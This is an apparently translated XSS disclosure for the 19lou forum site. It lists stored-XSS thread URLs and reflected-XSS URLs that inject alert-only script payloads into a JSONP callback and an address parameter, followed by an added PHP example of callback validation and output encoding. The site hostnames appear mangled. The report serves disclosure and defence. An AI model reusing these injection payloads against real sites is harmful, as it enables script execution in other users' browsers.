Input submitted through the posting form is not strictly filtered, which leads to XSS vulnerabilities!

Stored:
http://HdhCmsTest19lou测试数据/forum-3206-thread-15301334835859518-1-1.html
http://HdhCmsTest19lou测试数据/forum-291-thread-18701334837491991-1-1.html

Reflected:
http://topic.19lou测试数据/club/2010/lottery/jsonbaby.php?callback=?test<script>alert(/goderci/)</script>
http://HdhCmsTest19lou测试数据/haodian/list/business?categoryId=1&regionId=0&address="/><script>alert(/goderci/)</script>

Proof of vulnerability:
http://HdhCmsTest19lou测试数据/forum-3206-thread-15301334835859518-1-1.html
http://HdhCmsTest19lou测试数据/forum-291-thread-18701334837491991-1-1.html

Fix: filter the input!

Author: goderci
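The report gives the fix only as "filter". The following is an added example, not part of the original report and not the site's code, showing what that means for the two reflected cases: the JSONP `callback` parameter is validated against a strict identifier pattern, and the `address` value is encoded for an HTML attribute. The function names `jsonp_response` and `attr`, the `<input>` markup and the sample data are assumptions.

```php
<?php
// Added example (not the site's code). Function names are hypothetical.

// JSONP: accept only a plain JavaScript identifier path as the callback name.
function jsonp_response(string $callback, array $data): ?string
{
    $ident = '[A-Za-z_$][A-Za-z0-9_$]{0,63}';
    if (!preg_match('/\A' . $ident . '(\.' . $ident . ')*\z/', $callback)) {
        return null; // caller should answer 400 instead of echoing the value
    }
    // JSON_HEX_* keeps <, >, &, ' and " out of the body even if a browser
    // were to sniff the response as HTML.
    $json = json_encode($data, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return $callback . '(' . $json . ');';
}

// HTML attribute context: encode quotes and angle brackets before output,
// so a value cannot close the attribute or the tag.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs, copied from the parameter values quoted in the report.
$callback = '?test<script>alert(/goderci/)</script>';
$address  = '"/><script>alert(/goderci/)</script>';

$body = jsonp_response($callback, ['ok' => true]);
if ($body === null) {
    echo "callback rejected (respond with HTTP 400)\n";
} else {
    // In a real handler, send these headers before the body:
    // header('Content-Type: application/javascript; charset=utf-8');
    // header('X-Content-Type-Options: nosniff');
    echo $body, "\n";
}

// The reflected value now stays inside the attribute as inert text.
echo '<input name="address" value="' . attr($address) . '"/>', "\n";

// A legitimate callback name still works.
echo jsonp_response('jQuery123.cb', ['ok' => true]), "\n";
```

The stored cases in the forum threads need the same output encoding applied when post content is rendered, since the payload is already in the database by the time the page is built.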